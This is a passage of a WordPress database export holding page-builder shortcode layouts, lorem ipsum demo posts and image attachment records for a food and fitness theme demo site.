icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Mauris viverra est in diam sagittis, ornare dapibus ante semper. \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive Attitude!\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Nulla condimentum ipsum ac diam ultrices, in aliquet libero.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\" Praesent pulvinar finibus tempor. \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Aliquam consectetur, dui ac fringilla accumsan, velit.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"Quisque vel enim aliquet risus rhoncus condimentum eget vitae.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][/qodef_tabs][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" simple_background_color=\"#fafafa\" css=\".vc_custom_1520416931901{padding-top: 120px !important;padding-bottom: 106px !important;}\"][vc_column][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTY FOOD\" title=\"You Have A Choice\"][vc_empty_space height=\"62px\"][qodef_image_gallery type=\"carousel\" enable_image_shadow=\"no\" image_behavior=\"lightbox\" space_between_items=\"small\" number_of_visible_items=\"4\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_auto_width=\"yes\" enable-center=\"no\" slider_navigation=\"no\" slider_pagination=\"yes\" slider_pagination_skin=\"\" images=\"863,861,862,864,1779\" image_size=\"full\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519223603444{padding-top: 120px !important;padding-bottom: 120px !important;}\"][vc_column][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTY FOOD\" title=\"Classes Timetable\"][vc_empty_space height=\"60px\"][tt_timetable event=\",zumba,yoga-dance,body-balance-2\" event_category=\",body-balance,yoga-dance,zumba\" columns=\",monday,tuesday,wednesday,thursday,friday\" filter_style=\"tabs\" filter_kind=\"event_category\" select_time=\"H:i\" time_format=\"H\" show_end_hour=\"1\" event_layout=\"5\" hide_empty=\"1\" row_height=\"120\" box_bg_color=\"#ffffff\" box_hover_bg_color=\"\" box_txt_color=\"#ffffff\" box_hover_txt_color=\"#ffffff\" box_hours_txt_color=\"#ffffff\" box_hours_hover_txt_color=\"#ffffff\" filter_color=\"\" row1_color=\"#ffffff\" row2_color=\"#ffffff\" font=\"Quicksand:300\" font_size=\"14\"][/vc_column][/vc_row]','Fitness Home','','publish','closed','closed','','fitness-home','','','2018-01-24 14:12:33','2018-01-24 14:12:33','',0,'http://succulents.select-themes.com/?page_id=778',0,'page','',0),(781,1,'2018-01-24 07:01:54','2018-01-24 07:01:54','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Organic Veggie Mix For The Best Morning Start','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','organic-veggie-mix-for-the-best-morning-start','','','2018-01-24 07:01:54','2018-01-24 07:01:54','',0,'http://succulents.select-themes.com/?p=781',0,'post','',3),(798,1,'2018-01-24 14:36:26','2018-01-24 14:36:26','','h5-img-1','','inherit','open','closed','','h5-img-1','','','2018-01-24 14:36:26','2018-01-24 14:36:26','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-img-1.jpg',0,'attachment','image/jpeg',0),(811,1,'2018-01-24 15:10:12','2018-01-24 15:10:12','','h5-video-button','','inherit','open','closed','','h5-video-button','','','2018-01-24 15:10:12','2018-01-24 15:10:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-video-button.jpg',0,'attachment','image/jpeg',0),(825,1,'2018-01-24 05:39:00','2018-01-24 05:39:00','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Tea As A Refreshment','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','tea-as-a-refreshment','','','2018-01-24 05:39:00','2018-01-24 05:39:00','',0,'http://succulents.select-themes.com/?p=825',0,'post','',3),(838,1,'2018-01-24 15:38:22','2018-01-24 15:38:22','','blog-img-7','','inherit','open','closed','','blog-img-7','','','2018-01-24 15:38:22','2018-01-24 15:38:22','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-7.jpg',0,'attachment','image/jpeg',0),(839,1,'2018-01-24 15:38:24','2018-01-24 15:38:24','','blog-img-8','','inherit','open','closed','','blog-img-8','','','2018-01-24 15:38:24','2018-01-24 15:38:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-8.jpg',0,'attachment','image/jpeg',0),(844,1,'2018-01-24 04:44:55','2018-01-24 04:44:55','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Perfect Choice For Organic Lovers','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','perfect-choice-for-organic-lovers','','','2018-01-24 04:44:55','2018-01-24 04:44:55','',0,'http://succulents.select-themes.com/?p=844',0,'post','',3),(850,1,'2018-01-24 15:51:24','2018-01-24 15:51:24','','Left Sidebar','','publish','closed','closed','','left-sidebar','','','2018-01-24 15:51:24','2018-01-24 15:51:24','',0,'http://succulents.select-themes.com/?page_id=850',0,'page','',0),(853,1,'2018-01-24 15:52:47','2018-01-24 15:52:47','','No Sidebar','','publish','closed','closed','','no-sidebar','','','2018-01-24 15:52:47','2018-01-24 15:52:47','',0,'http://succulents.select-themes.com/?page_id=853',0,'page','',0),(861,1,'2018-01-25 09:04:33','2018-01-25 09:04:33','','h5-img-3','','inherit','open','closed','','h5-img-3','','','2018-01-25 09:04:33','2018-01-25 09:04:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-img-3.jpg',0,'attachment','image/jpeg',0),(862,1,'2018-01-25 09:04:35','2018-01-25 09:04:35','','h5-img-4','','inherit','open','closed','','h5-img-4','','','2018-01-25 09:04:35','2018-01-25 09:04:35','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-img-4.jpg',0,'attachment','image/jpeg',0),(863,1,'2018-01-25 09:04:37','2018-01-25 09:04:37','','h5-img-5','','inherit','open','closed','','h5-img-5','','','2018-01-25 09:04:37','2018-01-25 09:04:37','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-img-5.jpg',0,'attachment','image/jpeg',0),(864,1,'2018-01-25 09:04:38','2018-01-25 09:04:38','','h5-img-6','','inherit','open','closed','','h5-img-6','','','2018-01-25 09:04:38','2018-01-25 09:04:38','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h5-img-6.jpg',0,'attachment','image/jpeg',0),(869,1,'2018-01-25 09:20:32','2018-01-25 09:20:32','[vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1517930803446{padding-bottom: 0px !important;}\"][vc_column][rev_slider_vc alias=\"home8\" enable_paspartu=\"no\"][vc_empty_space height=\"90px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SOUL IS YOUR POWER\" title=\"Asana Rabel\"][qodef_single_image enable_image_shadow=\"no\" image=\"2239\" image_size=\"full\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519374171424{padding-bottom: 5px !important;}\"][vc_column width=\"3/12\"][/vc_column][vc_column width=\"6/12\"][vc_empty_space height=\"21px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla mauris nisi, molestie sit amet condimentum eu, hendrerit a nulla. Aliquam erat volutpat. Nam laoreet nec est vitae hendrerit. Duis nibh magna, luctus eget libero in, fringilla laoreet arcu. Vestibulum nec ultricies sapien. Sed vitae lorem ante. Integer in massa hendrerit, mollis felis id, porttitor dolor.[/vc_column_text][vc_empty_space height=\"22px\"][qodef_single_image enable_image_shadow=\"no\" image=\"950\" image_size=\"full\"][/vc_column][vc_column width=\"3/12\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519374212575{padding-top: 55px !important;padding-bottom: 90px !important;}\"][vc_column][qodef_image_gallery type=\"masonry\" enable_image_shadow=\"no\" image_behavior=\"lightbox\" number_of_columns=\"three\" space_between_items=\"small\" image_size=\"full\" images=\"4275,4277,4278,4280,4282,4283,4284\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & SOUL FOOD\" title=\"Asana Rabel\"][vc_empty_space height=\"70px\"][vc_row_inner css=\".vc_custom_1519374256472{padding-bottom: 30px !important;}\"][vc_column_inner width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0px 21px 80px 21px\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h3\" custom_icon=\"2896\" icon_hover_color=\"#ffbea5\" title=\"Think with heart\" text=\"Nullam id dolor id nibh ultricie vehicula ut id elit. Aenean eu leo quam entesque ornare sem lacinia venenatis . \" text_padding=\" 20px 30px\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column_inner][vc_column_inner width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0px 21px 80px 21px\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h3\" custom_icon=\"1497\" icon_hover_color=\"#ffbea5\" title=\"Think with heart\" text=\"Nullam id dolor id nibh ultricie vehicula ut id elit. Aenean eu leo quam entesque ornare sem lacinia venenatis . \"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column_inner][vc_column_inner width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0px 21px 80px 21px\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h3\" custom_icon=\"1498\" icon_hover_color=\"#ffbea5\" title=\"Think with heart\" text=\"Nullam id dolor id nibh ultricie vehicula ut id elit. Aenean eu leo quam entesque ornare sem lacinia venenatis . \"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_row_inner row_content_width=\"grid\" css=\".vc_custom_1517996618111{padding-top: 50px !important;padding-bottom: 70px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h8-img-8.jpg?id=2269) !important;}\"][vc_column_inner][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0px 43% 50px 8%\" item_padding_680_768=\"0 6% 56px 6%\" item_padding_1280_1600=\"0px 43% 53px 8%\" item_padding_768_1024=\"0px 25% 54px 8% \" item_padding_680=\"0px 10% 59px 8%\"][vc_column_text]\n

Subscribe to our newsletter

\n[/vc_column_text][vc_empty_space height=\"20px\"][contact-form-7 id=\"159\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-5 vc_col-md-offset-0 vc_col-md-12\" css=\".vc_custom_1519042182504{padding-left: 0px !important;}\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"1024\" alignment_one_column=\"center\"][qodef_elements_holder_item item_padding=\"117px 20px 0 4px\" item_padding_680=\"100px 0px 0 15px\" item_padding_768_1024=\"100px 61px 0 61px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h2\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTY FOOD\" title=\"Healthy Sweets\"][vc_empty_space height=\"11px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla mauris nisi, molestie sit amet condimentum eu, hendrerit a nulla. Aliquam erat volutpat. Nam laoreet nec.[/vc_column_text][vc_empty_space height=\"30px\"][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-7 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"51px 0 37px 0px\" item_padding_768_1024=\"84px 0px 63px 66px\" item_padding_680=\"51px 0 37px 0px\" item_padding_680_768=\"51px 0 37px 0px\"][qodef_single_image enable_image_shadow=\"no\" image=\"982\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row]','Yoga Home','','publish','closed','closed','','yoga-home','','','2018-01-25 09:20:32','2018-01-25 09:20:32','',0,'http://succulents.select-themes.com/?page_id=869',0,'page','',0),(872,1,'2018-01-25 09:22:34','2018-01-25 09:22:34','[vc_row][vc_column][qodef_vertical_split_slider][qodef_vertical_split_slider_left_panel][qodef_vertical_split_slider_content_item background_image=\"1143\" item_padding=\"0 0 0 0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 0 0 0\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][qodef_vertical_split_slider_content_item item_padding=\"0 0 0 0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0px 131px 0px 132px\" item_padding_680=\"0px 0px 0px 0px\" item_padding_1024_1280=\"70px 23px 5px 0px\" item_padding_680_768=\"289px 80px 0 0\" item_padding_1280_1600=\"55px 39px 0px 2px\" item_padding_768_1024=\"169px 135px 0px 180px\"][qodef_icon_with_text type=\"icon-right\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h3\" custom_icon=\"1203\" title=\"Organic & Pure\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam a tincidunt nisi. Pellentesque eleifend elit felis, a tincidunt.\" text_top_margin=\"14\"][vc_empty_space height=\"20px\"][qodef_icon_with_text type=\"icon-right\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h3\" custom_icon=\"2377\" title=\"Full Flavour\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam a tincidunt nisi. Pellentesque eleifend elit felis, a tincidunt.\" text_top_margin=\"14\"][vc_empty_space height=\"20px\"][qodef_icon_with_text type=\"icon-right\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h3\" custom_icon=\"1204\" title=\"Safe Packaging\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam a tincidunt nisi. Pellentesque eleifend elit felis, a tincidunt.\" text_top_margin=\"14\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][qodef_vertical_split_slider_content_item background_image=\"1211\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"center\"][qodef_elements_holder_item item_padding=\"0 0 0 0px\" item_padding_1280_1600=\"0 0 0 0px\" item_padding_1024_1280=\"0 0 100px 0px\" item_padding_768_1024=\"100px 0 0 0px\" item_padding_680_768=\"0 0 0 0px\" item_padding_680=\"0 0 0 0px\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][qodef_vertical_split_slider_content_item item_padding=\"0 0 0 0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"10px 17% 0px 17%\" item_padding_1024_1280=\"31px 15% 0px 14%\" item_padding_1280_1600=\"45px 17% 0px 17%\" item_padding_680=\"65px 11% 44px 11%\" item_padding_768_1024=\"164px 24% 0px 26%\" item_padding_680_768=\"327px 17% 0px 17% \"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" subtitle=\"SWEET & HEALTHY FOOD\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam a tincidunt nisi. Pellentesque eleifend elit felis, a tincidunt metus mollis placerat. Nam ultrices ipsum in justo maximus aliquet. \" title=\"Tea for Rainy Days\"][qodef_progress_bar title_tag=\"h5\" percent=\"38\" title=\"Aloe Shots\"][qodef_progress_bar title_tag=\"h5\" percent=\"51\" title=\"Smoothies\"][qodef_progress_bar title_tag=\"h5\" percent=\"63\" title=\"Veggie Wraps\"][qodef_progress_bar title_tag=\"h5\" percent=\"79\" title=\"Supplements\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][qodef_vertical_split_slider_content_item background_image=\"1283\" item_padding=\"0 0 0 0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 0 0 0\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][/qodef_vertical_split_slider_left_panel][qodef_vertical_split_slider_right_panel][qodef_vertical_split_slider_content_item alignment=\"center\" item_padding=\"0 0 0 0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 20% 0 19%\" item_padding_1024_1280=\"1px 17% 19px 11%\" item_padding_768_1024=\"230px 20% 0 19%\" item_padding_680=\"113px 10% 50px 10%\" item_padding_680_768=\"361px 20% 0 19%\" item_padding_1280_1600=\"0 18% 18px 18%\"][qodef_single_image enable_image_shadow=\"no\" image=\"1148\" image_size=\"full\"][qodef_custom_font title_tag=\"\" font_weight=\"300\" subtitle_font_weight=\"\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"center\" title=\"Tea O\'clock\" subtitle=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam in consectetur metus, ultricies elementum sem. Maecenas posuere feugiat enim, id bibendum libero imperdiet eu, usce.\" font_family=\"Quicksand\" font_size=\"65px\" letter_spacing=\"3px\" margin=\"-12px 0 13px 0\" font_size_680=\"35\" line_height_680=\"40\"][vc_empty_space][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][qodef_vertical_split_slider_content_item item_padding=\"0 0 0 0\" background_image=\"3346\"][qodef_elements_holder holder_full_height=\"yes\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 0 0 0px\" item_padding_680=\"100px 0 0 0 \" item_padding_768_1024=\"100px 0 0 0 \" item_padding_680_768=\"159px 0 0px 0\" custom_class=\"qodef-remove\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][qodef_vertical_split_slider_content_item item_padding=\"0 0 0 0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 25% 0 25%\" item_padding_680_768=\"265px 17% 0 17%\" item_padding_1024_1280=\"31px 15% 0 15%\" item_padding_1280_1600=\"5px 18% 0 18%\" item_padding_680=\"83px 9% 0 9%\" item_padding_768_1024=\"122px 24% 0 26%\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" subtitle=\"SWEET & HEALTHY FOOD\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam a tincidunt nisi. Pellentesque eleifend elit felis, a tincidunt metus mollis placerat. Nam ultrices ipsum in justo. \" title=\"Detox plan SEVEN \"][vc_empty_space][qodef_single_image enable_image_shadow=\"no\" image=\"1216\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][qodef_vertical_split_slider_content_item background_image=\"1277\" item_padding=\"0 0 0 0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][qodef_vertical_split_slider_content_item alignment=\"center\" item_padding=\"0 0 0 5%\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding_680=\"174px 14px 0px 0%\" item_padding=\"0 0 0 0\" item_padding_680_768=\"367px 4% 0px 0%\" item_padding_768_1024=\"241px 33px 0px 0%\" item_padding_1280_1600=\"0px 22px 16px 22px\"][qodef_single_image enable_image_shadow=\"no\" image=\"52\" image_size=\"300x55\"][vc_column_text]\n

Succulets is simply dummy text of the printing and

\n[/vc_column_text][vc_column_text css=\".vc_custom_1516715206030{margin-top: -7px !important;}\"]\n

typesetting industry lorem ipsum lorem dummy text of the

\n[/vc_column_text][vc_column_text css=\".vc_custom_1516715198974{margin-top: -7px !important;}\"]\n

printing lovely fonts and lovely.

\n[/vc_column_text][vc_empty_space height=\" 33px\"][vc_column_text]\n
Email us: succulents@gmail.com
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516715078902{margin-top: -10px !important;}\"]\n
Phone us: 0408 266 7759
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516715086438{margin-top: -10px !important;}\"]\n
Visit us: 20 South Summer Street, US
\n[/vc_column_text][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_vertical_split_slider_content_item][/qodef_vertical_split_slider_right_panel][/qodef_vertical_split_slider][/vc_column][/vc_row][vc_row][vc_column][vc_column_text][/vc_column_text][/vc_column][/vc_row]','Split Screen Showcase','','publish','closed','closed','','split-screen-showcase','','','2018-01-25 09:22:34','2018-01-25 09:22:34','',0,'http://succulents.select-themes.com/?page_id=872',0,'page','',0),(875,1,'2018-01-23 09:51:39','2018-01-23 09:51:39','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
